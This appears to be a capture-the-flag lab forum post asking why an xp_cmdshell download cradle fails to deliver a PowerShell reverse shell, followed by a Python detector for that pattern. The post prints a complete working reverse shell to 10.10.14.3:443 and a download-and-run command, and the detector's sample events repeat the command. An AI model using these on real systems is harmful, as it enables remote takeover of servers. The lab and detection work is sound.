SOLVED: Path to the payload was incorrect in web server.
Hello
I am having trouble getting a shell back for sql_svc.
I have set up my nc correctly listening on 443 and established my mini web server on port 80. I can browse to it myself and see the file that is supposed to be picked up. I named the callback script shell.ps1 just like it suggested.
I also changed all the IPs within the PowerShell script to make sure it was calling back to my tunnel and not whatever IP was listed in the instructions, “10.10.14.3”.
Here is the script:
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Whenever I run the xp_cmdshell command into my SQL session it does nothing. My web server does nothing as well.
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");"
I’m still learning Unix basics as well, but I saved the PowerShell script in Kali by simply naming it shell.ps1 in Text Editor with the commands listed inside, just like it is above. This is correct, right? It should treat the file as intended on the SQL Server?
Thank you in advance for the help!
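
A defender-side view of the command in this post, as an added example that is not part of the original thread: xp_cmdshell runs its argument through cmd.exe as a child of sqlservr.exe, so process-creation logs show that parent/child pair together with the download cradle. The event records below are constructed in Sysmon Event ID 1 field style (the SQL Server install path is a made-up sample), and the function names are assumptions.

```python
import ntpath
import re

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# IEX / Invoke-Expression followed by a WebClient download method on the same line
CRADLE = re.compile(r"(?i)\b(IEX|Invoke-Expression)\b.*\bDownload(String|File|Data)\b")
URL = re.compile(r"(?i)https?://[^\s\"'\\)]+")

# Constructed sample events, not taken from the post.
SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
SAMPLE_EVENTS = [
    {"ParentImage": SQL, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\system32\cmd.exe" /c powershell '
                    r'"IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");"'},
    {"ParentImage": SQL, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\system32\cmd.exe" /c whoami'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem"},
]

def triage(event):
    """Return a finding dict for a suspicious process-creation event, else None."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    child = ntpath.basename(event["Image"]).lower()
    cmdline = event["CommandLine"]
    reasons = []
    if parent == "sqlservr.exe" and child in SHELLS:
        reasons.append("shell spawned by SQL Server (xp_cmdshell pattern)")
    if CRADLE.search(cmdline):
        reasons.append("PowerShell download-and-execute cradle")
    if not reasons:
        return None
    return {
        "reasons": reasons,
        "urls": URL.findall(cmdline),  # remote script locations to pivot on
        "severity": "high" if len(reasons) == 2 else "medium",
    }

def scan(events):
    """Triage every event and keep only the findings."""
    return [finding for finding in map(triage, events) if finding]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"], finding["reasons"], finding["urls"])
```
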